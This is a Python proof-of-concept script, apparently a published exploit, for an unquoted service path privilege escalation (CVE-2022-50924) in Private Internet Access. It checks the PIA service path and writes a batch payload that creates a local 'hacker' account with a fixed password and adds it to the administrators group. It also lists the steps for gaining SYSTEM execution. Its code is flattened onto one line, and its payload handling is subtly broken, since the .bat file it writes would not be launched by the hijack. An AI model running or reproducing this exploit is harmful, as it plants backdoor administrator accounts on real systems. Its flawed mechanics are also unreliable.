CVE-2022-50924 Private Internet Access 未引号服务路径提权漏洞

#!/usr/bin/env python3 # CVE-2022-50924 PoC - Private Internet Access Unquoted Service Path # This PoC demonstrates the unquoted service path vulnerability in PIA 3.3 # Author: Security Researcher # Note: For educational and authorized testing purposes only import os import sys import subprocess import time def check_vulnerability(): """ Check if the system is vulnerable to CVE-2022-50924 Checks the PIA service configuration for unquoted paths """ try: # Query the PIA service configuration using sc command result = subprocess.run( ['sc', 'qc', 'pia_service'], capture_output=True, text=True, timeout=10 ) if result.returncode == 0: output = result.stdout # Check if BINARY_PATH_NAME contains unquoted path with spaces if 'BINARY_PATH_NAME' in output: for line in output.split('\n'): if 'BINARY_PATH_NAME' in line: path = line.split(':', 1)[1].strip() if ':' in line else line.strip() print(f"[+] Found PIA service path: {path}") # Check for unquoted path with spaces if not path.startswith('"') and ' ' in path: print("[!] VULNERABLE: Path is not quoted and contains spaces") print("[!] This allows path hijacking via space-separated directories") return True else: print("[-] NOT VULNERABLE: Path is properly quoted") return False else: print("[-] PIA service not found on this system") return False except Exception as e: print(f"[-] Error checking vulnerability: {e}") return False def create_payload(payload_path): """ Create a malicious executable that will be placed in the unquoted path This creates a simple reverse shell or command execution payload """ try: # Check if we can write to the target directory target_dir = os.path.dirname(payload_path) # For demonstration, create a simple batch script as payload # In real attack, this would be a compiled executable payload_script = f"""@echo off echo [CVE-2022-50924] Payload executed with SYSTEM privileges > C:\\pwned.txt net user hacker P@ssw0rd123 /add net localgroup administrators hacker /add echo Privilege Escalation Successful > C:\\escalation.txt """ with open(payload_path.replace('.exe', '.bat'), 'w') as f: f.write(payload_script) print(f"[+] Payload created: {payload_path.replace('.exe', '.bat')}") return True except PermissionError: print("[-] Permission denied: Cannot write to target directory") print("[-] This might indicate proper permissions or non-vulnerable configuration") return False except Exception as e: print(f"[-] Error creating payload: {e}") return False def main(): print("="*60) print("CVE-2022-50924 - Private Internet Access Unquoted Service Path") print("="*60) print() # Step 1: Check if system is vulnerable print("[*] Step 1: Checking if system is vulnerable...") if check_vulnerability(): print("[+] System appears to be vulnerable") # Step 2: Demonstrate exploitation (requires elevated privileges) print("\n[*] Step 2: To exploit this vulnerability:") print(" 1. Place a malicious executable in a directory along the service path") print(" 2. Common targets: C:\\Program.exe or C:\\Program Files\") print(" 3. Wait for service restart or system reboot") print(" 4. Malicious code executes with SYSTEM privileges") # Example payload path (would need to match actual service path) example_payload = "C:\\Program.exe" print(f"\n[*] Example payload location: {example_payload}") create_payload(example_payload) else: print("[-] System does not appear to be vulnerable") print("[-] Either PIA is not installed or service path is properly quoted") print("\n[*] Remediation: Update Private Internet Access to latest version") print("[*] Download: https://www.privateinternetaccess.com/download") print("="*60) if __name__ == "__main__": main()